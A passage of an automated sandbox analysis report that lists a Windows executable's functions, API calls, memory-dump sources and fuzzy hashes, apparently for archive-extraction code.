              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 3ce46fa86ce99e18cf580052d36c16201f64e4b15773aa12bc12d8f27d48fe79
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: 3ce46fa86ce99e18cf580052d36c16201f64e4b15773aa12bc12d8f27d48fe79
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              Function 00B9DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d25866b57e9e4348a688311e2dfdbde937a95f723ae7439d7b1277af6d254443
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: d25866b57e9e4348a688311e2dfdbde937a95f723ae7439d7b1277af6d254443
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              Function 00B9DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e13609aa0b850bb0c4aa97353feb7b07b45349f23d97a8b515a864cf415459d2
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: e13609aa0b850bb0c4aa97353feb7b07b45349f23d97a8b515a864cf415459d2
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              Function 00B9DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9381dcb99fd4deed4b6f1b42947bf9480bab28668d075273a253a40753ec532e
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: 9381dcb99fd4deed4b6f1b42947bf9480bab28668d075273a253a40753ec532e
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              Function 00B9DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 5cbf9dfe428043099254e7e167b98c19257ab3bd887922d212df01070638827e
              • Instruction ID: b07dcb3f31a209a83566b58dc67197620034b70ede61692c61fcdfec62c52ac0
              • Opcode Fuzzy Hash: 5cbf9dfe428043099254e7e167b98c19257ab3bd887922d212df01070638827e
              • Instruction Fuzzy Hash: B1A0029556D1027D350C65566D57D7602ACC4C4B513304DADB5079406155C0DC455431
              Function 00B9DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e5351d1812ef9f832aa0aa3a10f6dbd5560eb67f615702687beb4ad4780a525e
              • Instruction ID: b07dcb3f31a209a83566b58dc67197620034b70ede61692c61fcdfec62c52ac0
              • Opcode Fuzzy Hash: e5351d1812ef9f832aa0aa3a10f6dbd5560eb67f615702687beb4ad4780a525e
              • Instruction Fuzzy Hash: B1A0029556D1027D350C65566D57D7602ACC4C4B513304DADB5079406155C0DC455431
              Function 00B89EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
              Download Yara Rule
              APIs
              • SetEndOfFile.KERNELBASE(?,00B89104,?,?,-00001964), ref: 00B89EC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: b65e8f32245f1e87dafc6693e807d5f1df4fb77b1b77bfb8c10bbabb36bbb696
              • Instruction ID: 9c8fcd1559b11e9b27f6767c92087a716add9f5d68eac979b7f0908ff76d1314
              • Opcode Fuzzy Hash: b65e8f32245f1e87dafc6693e807d5f1df4fb77b1b77bfb8c10bbabb36bbb696
              • Instruction Fuzzy Hash: 85B011300A000A8B8E003B30CC08A283AA0EA22B0A30282A0A002CA0A0CF22C002AA00
              Function 00B9A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00B9A587,C:\Users\user\Desktop,00000000,00BC946A,00000006), ref: 00B9A326
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: bc5f5c4856752fa653ebe8da2759825e8975f23580f9299aa6653e4243177dc8
              • Instruction ID: c5bce252f2e5a109c81547a34c10b5d54f0f1496171ef9960b7a7f1a293ed961
              • Opcode Fuzzy Hash: bc5f5c4856752fa653ebe8da2759825e8975f23580f9299aa6653e4243177dc8
              • Instruction Fuzzy Hash: 6BA01230194006678B000B34CC09C1576945760B02F0087207002C10A0CF308814A500
              Function 00B896D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • CloseHandle.KERNELBASE(000000FF,?,?,00B8968F,?,?,?,?,00BB1FA1,000000FF), ref: 00B896EB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: 2c0809e4cc501b9244f517ea33055ec750118beae7a6d4492d20a1138bdf8abf
              • Instruction ID: c94856fe226299e1ac3cae8d373fcb7baa248f1ca63b9cbe1e7f58c1a9cac578
              • Opcode Fuzzy Hash: 2c0809e4cc501b9244f517ea33055ec750118beae7a6d4492d20a1138bdf8abf
              • Instruction Fuzzy Hash: 36F05E31556B048FDF30AA24D5487A2B7E49B12725F088B9E90E7434B0A761688DCB00

              Non-executed Functions

              Function 00B9B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B9B971
              • EndDialog.USER32(?,00000006), ref: 00B9B984
              • GetDlgItem.USER32(?,0000006C), ref: 00B9B9A0
              • SetFocus.USER32(00000000), ref: 00B9B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B9B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B9BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 00B9BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9BA94
              • _swprintf.LIBCMT ref: 00B9BAC4
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B9BAD7
              • FindClose.KERNEL32(00000000), ref: 00B9BADE
              • _swprintf.LIBCMT ref: 00B9BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B9BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B9BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B9BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9BBC9
              • _swprintf.LIBCMT ref: 00B9BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B9BC08
              • _swprintf.LIBCMT ref: 00B9BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B9BC6F
                • Part of subcall function 00B9A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9A662
                • Part of subcall function 00B9A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE600,?,?), ref: 00B9A6B1
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: 7e3c71df7486448a98c8c4b9009689407b3c2ab709960151525af14b69933d7b
              • Instruction ID: 70e6d1bdabade18fc4eebf1d4e0777ea7e79fc4f49e6597fa8b1d039659931e7
              • Opcode Fuzzy Hash: 7e3c71df7486448a98c8c4b9009689407b3c2ab709960151525af14b69933d7b
              • Instruction Fuzzy Hash: 6F919372248348BFD621ABA4DD89FFB77ECEB49700F040969B749D7091DB71A604C762
              Function 00B8718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B87191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00B872F1
              • CloseHandle.KERNEL32(00000000), ref: 00B87301
                • Part of subcall function 00B87BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87C04
                • Part of subcall function 00B87BF5: GetLastError.KERNEL32 ref: 00B87C4A
                • Part of subcall function 00B87BF5: CloseHandle.KERNEL32(?), ref: 00B87C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00B8730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B8741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B87446
              • CloseHandle.KERNEL32(?), ref: 00B87457
              • GetLastError.KERNEL32 ref: 00B87467
              • RemoveDirectoryW.KERNEL32(?), ref: 00B874B3
              • DeleteFileW.KERNEL32(?), ref: 00B874DB
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: ccadc08f97215ff7b239dfa1b63d0ce41ab19f59f170e2e62c8f8a2f080ffbef
              • Instruction ID: 184b75e355aee166a06e266cc29427efe721e46411661dcabcd825b290e60f88
              • Opcode Fuzzy Hash: ccadc08f97215ff7b239dfa1b63d0ce41ab19f59f170e2e62c8f8a2f080ffbef
              • Instruction Fuzzy Hash: C2B1E071904215ABDF20EBA4CC81BEE77F8EF04704F1401E9F909E7252EB74AA49CB61
              Function 00B83281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: 0b2c6266a967ffcf7a19d064917da4de13482eba7e949e17c8b445a245ec1834
              • Instruction ID: fdc7c1dadaf8367f80933c15c0d8effb51d2fa83538e31143a2534146395b336
              • Opcode Fuzzy Hash: 0b2c6266a967ffcf7a19d064917da4de13482eba7e949e17c8b445a245ec1834
              • Instruction Fuzzy Hash: C232A7715142849FDF14EF74C895AEA3BE5EF54B00F0444BEFD8A8B292EB709949CB60
              Function 00BAD00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 68c8f7e7127c98a44103df9fd384ae3d397ad02ec4824faa962a17656f750480
              • Instruction ID: 32e16db43efd3ce4360104f090637170c1b30db4f9baad1e6d76c25766354c61
              • Opcode Fuzzy Hash: 68c8f7e7127c98a44103df9fd384ae3d397ad02ec4824faa962a17656f750480
              • Instruction Fuzzy Hash: 40C23871E086288FDB25CE28DD407EAB7F5EB86304F1541EAD85EE7640E775AE818F40
              Function 00B827E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B827F1
              • _strlen.LIBCMT ref: 00B82D7F
                • Part of subcall function 00B9137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8B652,00000000,?,?,?,00010442), ref: 00B91396
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B82EE0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
              • String ID: CMT
              • API String ID: 1706572503-2756464174
              • Opcode ID: 51e063444f6d81852404ed8dcc0b292f47861cdc2ae14cb54a93bf1c69c851fe
              • Instruction ID: af0871a0caa10740ce7a13f684a88368aa94dd01cfca00dbdbc35c599f1cee60
              • Opcode Fuzzy Hash: 51e063444f6d81852404ed8dcc0b292f47861cdc2ae14cb54a93bf1c69c851fe
              • Instruction Fuzzy Hash: C262E5715042448FDF19EF38C8966EA3BE1EF54304F0545BEED9A8B2A2DB70E945CB60
              Function 00BA866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BA8767
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BA8771
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BA877E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 5ce9e86f3c576be94128be578a5bbe0ec1636d679a03a70b53984d5be0fd9c74
              • Instruction ID: e0c7b881b6385d1221f21dc56033a52b2d45ce1ee704cc2a360596fca572c4c2
